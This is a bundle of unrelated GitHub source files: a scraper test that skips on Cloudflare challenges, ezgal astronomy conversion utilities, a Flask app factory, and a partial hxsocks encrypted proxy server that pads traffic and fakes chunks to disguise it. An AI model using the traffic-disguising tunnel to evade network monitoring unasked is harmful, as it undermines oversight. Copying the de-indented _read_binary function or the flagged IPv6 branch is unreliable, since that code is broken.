    def test_retrieve_empty_page_from_tracker(
        self, empty_activision_user_string
    ) -> None:
        # An empty user string yields the tracker's 404 page
        scraper = create_scraper()
        soup = retrieve_page_from_tracker(
            scraper, empty_activision_user_string, cold_war_flag=True
        )
        # Check that the soup object contains a failed stats message
        failed_string = "404 Page not Found"
        assert failed_string in soup.text
class TestParseTrackerHtml:
    """Offline test: parsing a saved tracker HTML fixture must reproduce
    the known stats fixture."""
    def test_parse_tracker_html(
        self, html_page: str, joy_stats: ntc_stats.StatColumns
    ) -> None:
        soup = BeautifulSoup(html_page, "html.parser")
        stats = parse_tracker_html(soup)
        assert stats == joy_stats
class TestRetrieve:
    """Live tests for the high-level retrieve_stats helpers; skipped when
    Cloudflare blocks the request."""
    @pytest.mark.slow
    @pytest.mark.filterwarnings("ignore::DeprecationWarning")
    def test_retrieve_stats(
        self,
        valid_activision_user_string: str,
        joy_stats: ntc_stats.StatColumns,
    ) -> None:
        stats = retrieve_stats(valid_activision_user_string, cold_war_flag=True)
        # an empty dict signals the request was challenge-blocked, not a bug
        if stats == {}:
            pytest.skip("Cloudflare challenge detected, skipping test")
        assert stats == joy_stats

    @pytest.mark.slow
    @pytest.mark.filterwarnings("ignore::DeprecationWarning")
    def test_retrieve_stats_multiple(
        self,
        activision_user_string_list: list[str],
        stat_list: list[ntc_stats.StatColumns | dict | None],
    ) -> None:
        # batch retrieval preserves input order and per-user outcomes
        stats = retrieve_stats_multiple(
            activision_user_string_list, cold_war_flag=True
        )
        assert stats == stat_list
| cesaregarza/Nerdtracker_Client | nerdtracker_client/tests/test_scraper.py | test_scraper.py | py | 2,972 | python | en | code | 0 | github-code | 36 |
476733440 | from __future__ import (absolute_import, division, print_function,
unicode_literals)
import array, os, re
import numpy as np
import math
import sys
# some useful physical constants used by the conversion helpers below
c = 299792458 # speed of light (m/sec)
m_per_au = 1.49598e11 # meters per astronomical unit
au_per_pc = 3600 * 180 / np.pi # AUs per parsec (from the definition of the parsec)
def to_years(to_convert, units='gyrs', reverse=False):
    """ res = ezgal.utils.to_years( to_convert, units='gyrs', reverse=False )

    Convert the given time into years from the given units.  When
    ``reverse=True`` the conversion goes the other way: from years into
    the given units.

    :param to_convert: The time to convert
    :param units: The units the time is expressed in
    :param reverse: Convert *from* years when True
    :type to_convert: int, float
    :type units: string
    :type reverse: bool
    :returns: The converted time
    :rtype: int, float

    :Example:
        >>> import ezgal
        >>> ezgal.utils.to_years( 1e-9, units='gyrs' )
        1.0

    **units**

    Available units are (case insensitive):

    ================== ====================
    Name               Units
    ================== ====================
    gigayears,gyrs,gyr Gigayears
    megayears,myrs,myr Megayears
    years,yrs,yr       Years
    days,day           Days
    seconds,secs,sec,s Seconds
    log                log10(years)
    ================== ====================

    .. seealso:: :func:`ezgal.utils.convert_time`
    """
    units = units.lower()
    to_convert = np.asarray(to_convert)

    # log10(years) is not a multiplicative unit; handle it separately.
    if units == 'log':
        return np.log10(to_convert) if reverse else 10.0**to_convert

    # years-per-unit factor for each recognized multiplicative unit name
    factors = {}
    for names, factor in (
            (('gigayears', 'gyrs', 'gyr'), 1e9),
            (('megayears', 'myrs', 'myr'), 1e6),
            (('years', 'yrs', 'yr'), 1),
            (('days', 'day'), 1.0 / 365.0),
            (('seconds', 'secs', 'sec', 's'), 1.0 / (365.0 * 86400)),
    ):
        for name in names:
            factors[name] = factor

    if units in factors:
        factor = factors[units]
        if reverse:
            factor = 1.0 / factor
        return to_convert * factor

    raise NameError('Units of %s are not recognized!' % units)
def convert_time(to_convert, incoming='secs', outgoing='gyrs'):
    """ res = ezgal.utils.convert_time( to_convert, incoming='secs', outgoing='gyrs' )

    Convert the given time from the incoming units to the outgoing units
    by going through years as the intermediate unit.

    :param to_convert: The time to convert
    :param incoming: The units to convert the time from
    :param outgoing: The units to convert the time to
    :type to_convert: int, float
    :type incoming: string
    :type outgoing: string
    :returns: The converted time
    :rtype: int, float

    :Example:
        >>> import ezgal
        >>> ezgal.utils.convert_time( 1, incoming='years', outgoing='s' )
        31536000.0

    .. seealso:: see :func:`ezgal.utils.to_years` for available units."""
    in_years = to_years(to_convert, units=incoming)
    return to_years(in_years, units=outgoing, reverse=True)
def to_meters(to_convert, units='a'):
    """ res = ezgal.utils.to_meters( to_convert, units='a' )

    Converts a length from the given units to meters.

    :param to_convert: The length to convert
    :param units: The units the length is currently in
    :type to_convert: int, float
    :type units: string
    :returns: The converted length
    :rtype: int, float

    :Example:
        >>> import ezgal
        >>> ezgal.utils.to_meters( 1e10, units='a' )
        1.0

    **units**

    Available units are (case insensitive):

    ================= ====================
    Name              Units
    ================= ====================
    a,angstroms       Angstroms
    nm,nanometers     Nanometers
    um,microns        Microns
    mm,millimeters    Millimeters
    cm,centimeters    Centimeters
    m,meters          Meters
    km,kilometers     Kilometers
    au                Astronomical Units
    pc,parsecs        Parsecs
    kpc, kiloparsecs  Kiloparsecs
    mpc, megaparsecs  Megaparsecs
    ================= ====================

    .. seealso:: :func:`ezgal.utils.convert_length`
    """
    units = units.lower()
    to_convert = np.asarray(to_convert)
    if units == 'angstroms' or units == 'a': return to_convert / 1e10
    if units == 'nanometers' or units == 'nm': return to_convert / 1e9
    if units == 'microns' or units == 'um': return to_convert / 1e6
    if units == 'millimeters' or units == 'mm': return to_convert / 1e3
    if units == 'centimeters' or units == 'cm': return to_convert / 1e2
    if units == 'meters' or units == 'm': return to_convert
    if units == 'kilometers' or units == 'km': return to_convert * 1000.0
    if units == 'au': return to_convert * m_per_au
    if units == 'parsecs' or units == 'pc':
        return to_convert * m_per_au * au_per_pc
    # bug fix: the documented unit name 'kiloparsecs' was misspelled
    # 'kilparsecs' and therefore never matched; accept both spellings.
    if units == 'kiloparsecs' or units == 'kilparsecs' or units == 'kpc':
        return to_convert * m_per_au * au_per_pc * 1000.0
    if units == 'megaparsecs' or units == 'mpc':
        return to_convert * m_per_au * au_per_pc * 1e6
    raise NameError('Units of %s are not recognized!' % units)
def to_hertz(to_convert, units='a'):
    """ res = ezgal.utils.to_hertz( to_convert, units='Angstroms' )

    Convert the given wavelength (in the given units) to a frequency in
    hertz via nu = c / lambda.

    :param to_convert: The wavelength to convert
    :param units: The units the wavelength is in
    :type to_convert: int, float
    :type units: string
    :returns: The converted frequency
    :rtype: float

    :Example:
        >>> import ezgal
        >>> ezgal.utils.to_hertz( 1000, units='a' )
        2997924580000000.0

    .. seealso::
        see :func:`ezgal.utils.to_meters` for list of available units

        Also see :func:`ezgal.utils.to_lambda`
    """
    # speed of light expressed per one unit of the given wavelength units
    c_per_unit = c / to_meters(1.0, units=units)
    return c_per_unit / np.asarray(to_convert)
def to_lambda(to_convert, units='a'):
    """ res = ezgal.utils.to_lambda( to_convert, units='a' )

    Convert the given frequency to a wavelength in the given units via
    lambda = c / nu (the relation is symmetric with :func:`to_hertz`).

    :param to_convert: The frequency to convert
    :param units: The desired units of the output wavelength
    :type to_convert: int, float
    :type units: string
    :returns: The converted wavelength
    :rtype: float

    :Example:
        >>> import ezgal
        >>> ezgal.utils.to_lambda( 2997924580000000.0, units='a' )
        1000.0

    .. seealso::
        see :func:`ezgal.utils.to_meters` for list of available units

        Also see :func:`ezgal.utils.to_hertz`
    """
    # speed of light expressed per one unit of the requested wavelength units
    c_per_unit = c / to_meters(1.0, units=units)
    return c_per_unit / np.asarray(to_convert)
def convert_length(to_convert, incoming='m', outgoing='a'):
    """ res = ezgal.utils.convert_length( to_convert, incoming='m', outgoing='a' )

    Convert a length from the incoming units to the outgoing units by
    going through meters as the intermediate unit.

    :param to_convert: The length to convert
    :param incoming: The units to convert the length from
    :param outgoing: The units to convert the length to
    :type to_convert: int, float
    :type incoming: string
    :type outgoing: string
    :returns: The converted length
    :rtype: int, float

    :Example:
        >>> import ezgal
        >>> ezgal.utils.convert_length( 1, incoming='pc', outgoing='au' )
        206264.80624709636

    .. seealso:: see :func:`ezgal.utils.to_meters` for available units.
    """
    in_meters = to_meters(to_convert, units=incoming)
    return in_meters / to_meters(1.0, units=outgoing)
def rascii(filename, silent=False):
    """ res = ezgal.utils.rascii( filename, silent=False )

    Reads in numeric data stored in an ascii file into a numpy array.

    :param filename: The name of the ascii file, or an open file object
    :param silent: Whether or not to output basic file information
                   (NOTE(review): currently unused — kept for API
                   compatibility)
    :type filename: string
    :type silent: bool
    :returns: A 2D float numpy array, or an empty array if no numeric
              rows were found
    :rtype: np.array()

    .. warning::
        Skips any lines that have any non-numeric data, and any data lines
        with a different number of columns than the first data line.

    .. seealso:: :func:`ezgal.utils.wascii`
    """
    # accept an open file pointer or a filename; only close what we open
    opened_here = isinstance(filename, str)
    fh = open(filename, 'r') if opened_here else filename

    rows = []
    ncols = None
    try:
        for line in fh:
            # skip blank lines and lines containing anything that cannot be
            # part of a number (digits, '.', exponent chars e/E/d/D, signs)
            if re.search(r'^\s*$', line) or re.search(r'[^\s\d.eEdD\-+]', line):
                continue
            parts = line.split()
            if ncols is None:
                # the first numeric row fixes the expected column count
                ncols = len(parts)
            elif len(parts) != ncols:
                # skip rows whose column count differs from the first row
                continue
            rows.append(parts)
    finally:
        # bug fix: the original leaked the file handle when given a filename
        if opened_here:
            fh.close()

    # bug fix: the original raised NameError on files with no numeric rows
    if not rows:
        return np.array([])
    return np.array(rows, dtype='float')
def wascii(array, filename, formats, blank=False, header=None, names=None):
    """ ezgal.utils.wascii( array, filename, formats, blank=False, header=False, names=None )

    Writes out a np array to a well formated file.

    :param array: The numpy array to write out
    :param filename: The name of the output file, or an open file object
    :param formats: A python string format, or a list of formats (one per column)
    :param blank: Whether or not to output a blank line at the end of the file
    :param header: A string or list of strings to write out as the header
    :param names: A list of column names with which to build a header
    :type array: a 2D numpy array
    :type filename: string
    :type formats: string,list
    :type blank: bool
    :type header: string,list
    :type names: string,list
    :raises NameError: if the table is not 2D, or if the number of formats
        or names does not match the number of columns
    """
    table = np.asarray(array)
    if table.ndim != 2: raise NameError('I was expecting a 2D data table')
    nrows, ncols = table.shape

    # a single format string applies to every column
    if isinstance(formats, str):
        formats = [formats] * ncols
    if ncols != len(formats):
        raise NameError(
            'Number of supplied formats does not match number of table columns!')

    # if column names were provided, create a header that lists column
    # names/numbers
    if names is not None:
        if len(names) != ncols:
            raise NameError(
                'Number of supplied column names does not match number of table columns!')
        # bug fix: copy the header list so the caller's list is not mutated
        header = [] if header is None else list(header)
        header.append('# Column Descriptions:')
        # zero-padded column index wide enough for the largest column number
        name_format = '# %0' + ('%1d' %
                                (math.ceil(math.log10(ncols)))) + 'd: %s'
        for i in range(ncols):
            header.append(name_format % (i + 1, names[i]))

    # bug fix: use logical 'and' instead of bitwise '&' for the check
    if header is not None and isinstance(header, list):
        header = "\n".join(header)

    if ncols == 1:
        file = "\n".join(formats[0] % val for val in table.ravel())
    else:
        strings = [''] * nrows
        for i in range(nrows):
            strings[i] = ' '.join(
                [format % val for format, val in zip(formats, table[i, :])])
        file = "\n".join(strings)

    # filename can be a filename or file pointer;
    # in the case of a file pointer don't close it
    if isinstance(filename, str):
        # bug fix: open in text mode — 'wb' raised TypeError on python 3
        # because formatted output is str, not bytes
        fh = open(filename, 'w')
        do_close = True
    else:
        fh = filename
        do_close = False

    if header is not None: fh.write(header + "\n")
    fh.write(file)
    if blank: fh.write("\n")
    if do_close:
        fh.close()
def _read_binary(fhandle, type='i', number=1, swap=False):
'''
res = ezgal.utils._read_binary( fhandle, type='i', number=1, swap=False )
reads 'number' binary characters of type 'type' from file handle 'fhandle'
returns the value (for one character read) or a numpy array.
set swap=True to byte swap the array after reading
'''
if (sys.version_info >= (3, 0)) & (type == 'c'):
## unsigned char in python 2.
## https://docs.python.org/2/library/array.html
## https://docs.python.org/3/library/array.html
## type = 'B' ## unsigned char in python 3.
## type = 'b' ## signed char in python 3.
import warnings
type = 'B'
warnings.warn('Reassigning unsigned char type (c to B) as per python 3.')
arr = array.array(type)
arr.fromfile(fhandle, number)
if swap:
arr.byteswap()
if len(arr) == 1:
return arr[0]
else:
return np.asarray(arr)
def read_ised(file):
    """ ( seds, ages, vs ) = ezgal.utils.read_ised( file )

    Read a bruzual and charlot binary ised file.

    :param file: The name of the ised file
    :type file: string
    :returns: A tuple containing model data
    :rtype: tuple

    .. note::
        All returned variables are numpy arrays. ages and vs are one
        dimensional arrays, and seds has a shape of (vs.size, ages.size)

    **units**

    Returns units of:

    =============== ===============
    Return Variable Units
    =============== ===============
    seds            Ergs/s/cm**2/Hz
    ages            Years
    vs              Hz
    =============== ===============
    """
    if not (os.path.isfile(file)):
        raise ValueError('The specified model file was not found!')
    print('Reading .ised: %s' % str(file))
    # open the ised file
    fh = open(file, 'rb')
    # start reading
    junk = _read_binary(fh)
    nages = _read_binary(fh)
    # first consistency check: sanity-bound the age count so a corrupt or
    # wrongly-formatted file fails fast instead of allocating garbage
    if nages < 1 or nages > 2000:
        raise ValueError(
            'Problem reading ised file - unexpected data found for the number of ages!')
    # read ages
    ages = np.asarray(_read_binary(fh, type='f', number=nages))
    # read in a bunch of stuff that I'm not interested in but which I read like
    # this to make sure I get to the right spot in the file
    junk = _read_binary(fh, number=2)
    iseg = _read_binary(fh, number=1)
    if iseg > 0:
        junk = _read_binary(fh, type='f', number=6 * iseg)
    junk = _read_binary(fh, type='f', number=3)
    junk = _read_binary(fh)
    junk = _read_binary(fh, type='f')
    junk = _read_binary(fh, type='c', number=80)
    junk = _read_binary(fh, type='f', number=4)
    junk = _read_binary(fh, type='c', number=160)
    junk = _read_binary(fh)
    junk = _read_binary(fh, number=3)
    # read in the wavelength data
    nvs = _read_binary(fh)
    # consistency check
    if nvs < 10 or nvs > 12000:
        raise ValueError('Problem reading ised file - unexpected data found for the number of wavelengths!')
    # read wavelengths and convert to frequency (comes in as Angstroms)
    # also reverse the array so it will be sorted after converting to frequency
    ls = _read_binary(fh, type='f', number=nvs)[::-1]
    # create an array for storing SED info
    seds = np.zeros((nvs, nages))
    # now loop through and read in all the ages
    for i in range(nages):
        junk = _read_binary(fh, number=2)
        nv = _read_binary(fh)
        # every age record must carry the same number of wavelengths
        if nv != nvs:
            raise ValueError(
                'Problem reading ised file - unexpected data found while reading seds!')
        seds[:, i] = _read_binary(fh, type='f', number=nvs)[::-1]
        nx = _read_binary(fh)
        junk = _read_binary(fh, type='f', number=nx)
    # now convert the seds from Lo/A to ergs/s/Hz
    # (multiply by lambda^2/c — the Jacobian of the lambda -> nu change of variable)
    seds *= 3.826e33
    seds *= ls.reshape((nvs, 1))**2.0
    seds /= convert_length(c, outgoing='a')
    # convert from ergs/s/Hz to ergs/s/Hz/cm^2.0 @ 10pc
    seds /= 4.0 * np.pi * convert_length(10, incoming='pc', outgoing='cm')**2.0
    vs = to_hertz(ls)
    fh.close()
    # sort in frequency space
    sinds = vs.argsort()
    return (seds[sinds, :], ages, vs[sinds])
| cmancone/easyGalaxy | ezgal/utils.py | utils.py | py | 15,023 | python | en | code | 14 | github-code | 36 |
1154715752 | import os
from flask import Flask
from src.models import migrate, db
from src.command import data_load_command
from src.api import api
# Environment variable that points Flask at its config file; fall back to the
# bundled local config when the variable is not already set.
config_variable_name = 'FLASK_CONFIG_PATH'
default_config_path = os.path.join(os.path.dirname(__file__), 'config/local.py')
os.environ.setdefault(config_variable_name, default_config_path)
def create_app(config_file=None, settings_override=None):
    """Application factory: build, configure and return the Flask app.

    An explicit ``config_file`` wins; otherwise the config path is read
    from the environment variable.  ``settings_override`` is applied last.
    """
    app = Flask(__name__)

    if not config_file:
        app.config.from_envvar(config_variable_name)
    else:
        app.config.from_pyfile(config_file)
    if settings_override:
        app.config.update(settings_override)

    # register the "flask load_docs" CLI command
    @app.cli.command("load_docs")
    def load_docs():
        data_load_command()

    init_app(app)
    api.init_app(app)
    return app
def init_app(app):
    """Attach the SQLAlchemy and Flask-Migrate extensions to the app."""
    db.init_app(app)
    migrate.init_app(app, db)
| shano/document_keyword_analysis | app.py | app.py | py | 849 | python | en | code | 0 | github-code | 36 |
32365176970 | from __future__ import with_statement
import os
import sys
try:
import gevent
import gevent.monkey
gevent.monkey.patch_all(dns=gevent.version_info[0] >= 1)
except ImportError:
gevent = None
print >>sys.stderr, 'warning: gevent not found, using threading instead'
import errno
import socket
import threading
import time
import random
import select
import SocketServer
import struct
import hashlib
import hmac
import logging
import io
import json
import urlparse
import traceback
from collections import defaultdict, deque
from util import create_connection, get_ip_address, parse_hostport
import encrypt
from encrypt import compare_digest
from ecc import ECC
__version__ = '0.0.1'

# Protocol defaults and module-wide mutable state.
DEFAULT_METHOD = 'aes-128-cfb'  # cipher used when the server URL names none
DEFAULT_HASH = 'sha256'  # hash algorithm for server certificate signatures
MAC_LEN = 16
CTX = b'hxsocks'  # context string fed to the AEAD encryptor
USER_PASS = {'user': 'pass'}  # user -> password map; replaced from config.json in main()
SERVER_CERT = None  # ECC server certificate, loaded or created in main()
class KeyManager:
    """In-memory registry of per-user ephemeral ECDH session keys.

    All state lives in class-level dicts keyed by md5(client public key);
    NOTE(review): access is not synchronized even though handlers run in
    multiple threads — confirm whether that is acceptable.
    """
    # user name -> deque of md5(client pkey) digests, oldest first
    userpkeys = defaultdict(deque)
    # md5(client pkey) -> user name
    pkeyuser = {}
    # md5(client pkey) -> ECDH shared secret
    pkeykey = {}
    # md5(client pkey) -> registration timestamp
    pkeytime = {}

    @classmethod
    def create_key(cls, user, client_pkey, klen):
        """Register a client public key; return (server_pubkey, password),
        or (0, 0) if the key is already registered."""
        if cls.notvalid(user, client_pkey):
            return 0, 0
        # keep at most 4 live keys per user; evict the oldest
        if len(cls.userpkeys[user]) > 3:
            cls.del_key(cls.userpkeys[user][0])
        dh = ECC(klen)
        shared_secret = dh.get_dh_key(client_pkey)
        client_pkey = hashlib.md5(client_pkey).digest()
        cls.userpkeys[user].append(client_pkey)
        cls.pkeyuser[client_pkey] = user
        cls.pkeykey[client_pkey] = shared_secret
        cls.pkeytime[client_pkey] = time.time()
        return dh.get_pub_key(), USER_PASS[user]

    @classmethod
    def notvalid(cls, user, client_pkey):
        """True when this client public key is already registered (replay)."""
        return hashlib.md5(client_pkey).digest() in cls.pkeyuser

    @classmethod
    def check_key(cls, pubk):
        """Return 1 (truthy) if the key is unknown or older than 6 hours;
        expired keys are removed.  Returns None when the key is valid."""
        if pubk not in cls.pkeykey:
            return 1
        if cls.pkeytime[pubk] < time.time() - 6 * 3600:
            cls.del_key(pubk)
            return 1

    @classmethod
    def del_key(cls, pkey):
        """Forget a registered key (all four tables plus the user's deque)."""
        user = cls.pkeyuser[pkey]
        del cls.pkeyuser[pkey]
        del cls.pkeytime[pkey]
        del cls.pkeykey[pkey]
        cls.userpkeys[user].remove(pkey)

    @classmethod
    def get_user_by_pubkey(cls, pubkey):
        """User name that registered this (hashed) public key."""
        return cls.pkeyuser[pubkey]

    @classmethod
    def get_skey_by_pubkey(cls, pubkey):
        """ECDH shared secret for this (hashed) public key."""
        return cls.pkeykey[pubkey]
class HXSocksServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    """Threaded TCP server configured from an 'hxs://' or 'ss://' URL.

    The URL query string carries PSK, cipher method, optional upstream
    proxy, hash algorithm and whether plain shadowsocks requests are
    allowed (ss=1).
    """
    allow_reuse_address = True

    def __init__(self, serverinfo, forward, RequestHandlerClass, bind_and_activate=True):
        self.serverinfo = serverinfo
        # ports that clients may connect to even on loopback addresses
        self.forward = set(forward)
        p = urlparse.urlparse(serverinfo)
        if p.scheme == 'ss':
            # ss://method:password@host:port style
            self.PSK, self.method = p.password, p.username
        elif p.scheme == 'hxs':
            self.PSK = urlparse.parse_qs(p.query).get('PSK', [''])[0]
            self.method = urlparse.parse_qs(p.query).get('method', [DEFAULT_METHOD])[0]
        else:
            raise ValueError('bad serverinfo: {}'.format(self.serverinfo))
        q = urlparse.parse_qs(p.query)
        proxy = q.get('proxy', [''])[0]
        self.proxy = parse_hostport(proxy) if proxy else None
        # NOTE(review): attribute named 'server' actually holds the UA string
        self.server = q.get('UA', ['nginx/1.2.2'])[0]
        self.hash_algo = q.get('hash', [DEFAULT_HASH])[0].upper()
        # shadowsocks compatibility is enabled only when a PSK is set and ss=1
        self.ss = self.PSK and q.get('ss', ['1'])[0] == '1'
        addrs = socket.getaddrinfo(p.hostname, p.port)
        if not addrs:
            raise ValueError('cant resolve listen address')
        # bind with the address family of the first resolved address
        self.address_family = addrs[0][0]
        server_address = (p.hostname, p.port)
        SocketServer.TCPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate=bind_and_activate)
class HXSocksHandler(SocketServer.StreamRequestHandler):
    """Per-connection handler implementing the hxsocks wire protocol.

    Each connection starts with a PSK-encrypted stream.  Command bytes:
    10 = key exchange, 11 = hxsocks connect request, and 1/3/4/17/19/20 =
    plain shadowsocks address types (bit 4 set means one-time-auth).
    """
    timeout = 10
    bufsize = 1024 * 16

    def handle(self):
        """Read and dispatch commands from the client until the stream ends."""
        try:
            self.connection.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
            pskcipher = encrypt.Encryptor(self.server.PSK, self.server.method)
            self.connection.settimeout(self.timeout)
            # prime the PSK cipher with the client's IV
            data = self.rfile.read(pskcipher.iv_len)
            pskcipher.decrypt(data)
            while True:
                try:
                    data = self.rfile.read(1)
                    self.connection.settimeout(self.timeout)
                    cmd = ord(pskcipher.decrypt(data))
                except Exception as e:
                    logging.error('cmd Exception: server %s %r from %s:%s' % (self.server.server_address[1], e, self.client_address[0], self.client_address[1]))
                    break
                if cmd == 10:  # client key exchange
                    # random padding length used in the reply, to vary sizes
                    rint = random.randint(64, 255)
                    req_len = pskcipher.decrypt(self.rfile.read(2))
                    req_len = struct.unpack('>H', req_len)[0]
                    data = pskcipher.decrypt(self.rfile.read(req_len))
                    data = io.BytesIO(data)
                    # request layout: 4-byte timestamp, 1-byte pkey length,
                    # client public key, 32-byte HMAC auth tag
                    ts = data.read(4)
                    if abs(struct.unpack('>I', ts)[0] - time.time()) > 120:
                        # possible replay attack
                        logging.error('bad timestamp. client_ip: %s' % self.client_address[0])
                        break
                    pklen = ord(data.read(1))
                    client_pkey = data.read(pklen)
                    client_auth = data.read(32)
                    def _send(data):
                        data = struct.pack('>H', len(data)) + data
                        self.wfile.write(pskcipher.encrypt(data))
                    # identify the user by trying every known password
                    client = None
                    for user, passwd in USER_PASS.items():
                        h = hmac.new(passwd.encode(), ts + client_pkey + user.encode(), hashlib.sha256).digest()
                        if compare_digest(h, client_auth):
                            client = user
                            break
                    else:
                        logging.error('user not found. client_ip: %s' % self.client_address[0])
                        break
                    pkey, passwd = KeyManager.create_key(client, client_pkey, pskcipher.key_len)
                    if pkey:
                        logging.info('new key exchange. client: %s, ip: %s' % (client, self.client_address[0]))
                        # reply: status 0, lengths, server pubkey, auth hash,
                        # server cert, signature, then random padding
                        h = hmac.new(passwd.encode(), client_pkey + pkey + client.encode(), hashlib.sha256).digest()
                        scert = SERVER_CERT.get_pub_key()
                        signature = SERVER_CERT.sign(h, self.server.hash_algo)
                        data = chr(0) + chr(len(pkey)) + chr(len(scert)) + chr(len(signature)) + pkey + h + scert + signature + os.urandom(rint)
                        _send(data)
                        continue
                    else:
                        logging.error('Private_key already registered. client: %s, ip: %s' % (client, self.client_address[0]))
                        # KeyManager.del_key(hashlib.md5(client_pkey).digest())
                        break
                elif cmd == 11:  # a connect request
                    client_pkey = pskcipher.decrypt(self.rfile.read(16))
                    rint = random.randint(64, 2048)
                    def _send(code, cipher):
                        # code 1 (bad key) is answered with PSK-only random
                        # bytes; other codes go through the session cipher
                        if code == 1:
                            data = os.urandom(rint)
                            data = pskcipher.encrypt(struct.pack('>H', rint)) + data
                            self.wfile.write(data)
                        else:
                            ct = cipher.encrypt(chr(code) + os.urandom(rint-1))
                            data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
                            self.wfile.write(data)
                    if KeyManager.check_key(client_pkey):
                        logging.error('client key not exist or expired. client ip: %s' % self.client_address[0])
                        # drain the request body before replying
                        ctlen = struct.unpack('>H', pskcipher.decrypt(self.rfile.read(2)))[0]
                        self.rfile.read(ctlen)
                        _send(1, None)
                        continue
                    user = KeyManager.get_user_by_pubkey(client_pkey)
                    cipher = encrypt.AEncryptor(KeyManager.get_skey_by_pubkey(client_pkey), self.server.method, CTX)
                    ctlen = struct.unpack('>H', pskcipher.decrypt(self.rfile.read(2)))[0]
                    ct = self.rfile.read(ctlen)
                    data = cipher.decrypt(ct)
                    # request layout: timestamp, host length, host, port
                    buf = io.BytesIO(data)
                    ts = buf.read(4)
                    if abs(struct.unpack('>I', ts)[0] - time.time()) > 120:
                        logging.error('bad timestamp, possible replay attrack. client ip: %s' % self.client_address[0])
                        # KeyManager.del_key(client_pkey)
                        # _send(1, None)
                        break
                    host_len = ord(buf.read(1))
                    addr = buf.read(host_len)
                    port = struct.unpack('>H', buf.read(2))[0]
                    # refuse loopback targets unless the port is whitelisted
                    if self._request_is_loopback((addr, port)) and port not in self.server.forward:
                        logging.info('server %d access localhost:%d denied. from %s:%d, %s' % (self.server.server_address[1], port, self.client_address[0], self.client_address[1], user))
                        _send(2, cipher)
                        continue
                    try:
                        logging.info('server %d request %s:%d from %s:%d, %s' % (self.server.server_address[1],
                                     addr, port, self.client_address[0], self.client_address[1], user))
                        remote = create_connection((addr, port), timeout=10, proxy=self.server.proxy)
                        remote.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
                        _send(0, cipher)
                        # self.remote.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
                    except (IOError, OSError) as e:  # Connection refused
                        logging.warning('server %s:%d %r on connecting %s:%d' % (self.server.server_address[0], self.server.server_address[1], e, addr, port))
                        _send(2, cipher)
                        continue
                    # a truthy return value means the tunnel ended uncleanly,
                    # so the connection cannot be reused for another command
                    if self.forward_tcp(self.connection, remote, cipher, pskcipher, timeout=60):
                        break
                    self.connection.settimeout(60)
                    logging.debug('hxsocks connect reusable, except next connection')
                elif cmd in (1, 3, 4, 17, 19, 20):
                    # A shadowsocks request
                    if not self.server.ss:
                        logging.warning('shadowsocks not enabled for this server. port: %d' % self.server.server_address[1])
                        break
                    # bit 4 of cmd selects one-time-auth; low bits are the
                    # shadowsocks address type (1=IPv4, 3=hostname, 4=IPv6)
                    ota = cmd & 16
                    if cmd & 15 == 1:
                        _addr = pskcipher.decrypt(self.rfile.read(4))
                        addr = socket.inet_ntoa(_addr)
                    elif cmd & 15 == 3:
                        _addr = pskcipher.decrypt(self.rfile.read(1))
                        addr = pskcipher.decrypt(self.rfile.read(ord(_addr)))
                        _addr += addr
                    elif cmd & 15 == 4:
                        # NOTE(review): this builds a tuple and passes it as a
                        # single argument to inet_ntop, which expects
                        # (family, packed) as two arguments — looks broken;
                        # confirm the IPv6 path is ever exercised.
                        _addr = socket.AF_INET6, pskcipher.decrypt(self.rfile.read(16))
                        addr = socket.inet_ntop(_addr)
                    port = struct.unpack('>H', pskcipher.decrypt(self.rfile.read(2)))[0]
                    # verify
                    if ota:
                        header = chr(cmd) + _addr + struct.pack('>H', port)
                        self._ota_chunk_idx = 0
                        rmac = pskcipher.decrypt(self.rfile.read(10))
                        key = pskcipher.decipher_iv + pskcipher.key
                        mac = hmac.new(key, header, hashlib.sha1).digest()[:10]
                        if not compare_digest(rmac, mac):
                            logging.error("OTA Failed!!")
                            break
                    if self._request_is_loopback((addr, port)) and port not in self.server.forward:
                        logging.info('server %d access localhost:%d denied. from %s:%d' % (self.server.server_address[1], port, self.client_address[0], self.client_address[1]))
                        break
                    try:
                        remote = None
                        logging.info('server %d SS request %s:%d from %s:%d %s' % (self.server.server_address[1],
                                     addr, port, self.client_address[0], self.client_address[1], 'with ota' if ota else ''))
                        remote = create_connection((addr, port), timeout=10, proxy=self.server.proxy)
                        if ota:
                            return self.ssforward_tcp_ota(self.connection, remote, pskcipher, timeout=60)
                        return self.ssforward_tcp(self.connection, remote, pskcipher, timeout=60)
                    except (IOError, OSError) as e:  # Connection refused
                        logging.warn('server %s:%d %r on connecting %s:%d' % (self.server.server_address[0], self.server.server_address[1], e, addr, port))
                        return
                else:
                    logging.warning('unknown cmd %d, bad encryption key?' % cmd)
                    break
            # drain any bytes still in flight before the handler returns
            ins, _, _ = select.select([self.connection], [], [], 1)
            while ins:
                data = self.connection.recv(self.bufsize)
                if not data:
                    break
                ins, _, _ = select.select([self.connection], [], [], 1)
        except Exception as e:
            logging.error(repr(e))
            logging.error(traceback.format_exc())

    def forward_tcp(self, local, remote, cipher, pskcipher, timeout=60):
        """Relay an hxsocks tunnel between the client and the remote host.

        Chunks toward the client are framed as: PSK-encrypted 2-byte length,
        then session-encrypted [pad_len, payload, padding].  Pad lengths 1-7
        mark fake chunks used for traffic shaping.  Returns readable +
        writeable (0 means both directions closed cleanly and the client
        connection can be reused).
        """
        readable = 1
        writeable = 1
        closed = 0
        close_count = 0
        fds = [local, remote]
        total_send = 0
        try:
            while fds:
                if len(fds) < 2:
                    timeout = 3
                ins, _, _ = select.select(fds, [], [], timeout)
                if not ins:
                    logging.debug('timed out')
                    close_count += 1
                    if remote in fds:
                        fds.remove(remote)
                        remote.shutdown(socket.SHUT_RD)
                    if writeable:
                        # tell the client we are done writing: padding-only chunk
                        padding_len = random.randint(8, 255)
                        data = chr(padding_len) + b'\x00' * padding_len
                        ct = cipher.encrypt(data)
                        data = pskcipher.encrypt(struct.pack('>H', len(ct))) + ct
                        local.sendall(data)
                        writeable = 0
                    if close_count > 2:
                        break
                if local in ins:
                    ct_len = self.rfile.read(2)
                    if not ct_len:
                        logging.debug('client closed')
                        fds.remove(local)
                        remote.shutdown(socket.SHUT_WR)
                        closed = 1
                    else:
                        ct_len = struct.unpack('>H', pskcipher.decrypt(ct_len))[0]
                        ct = self.rfile.read(ct_len)
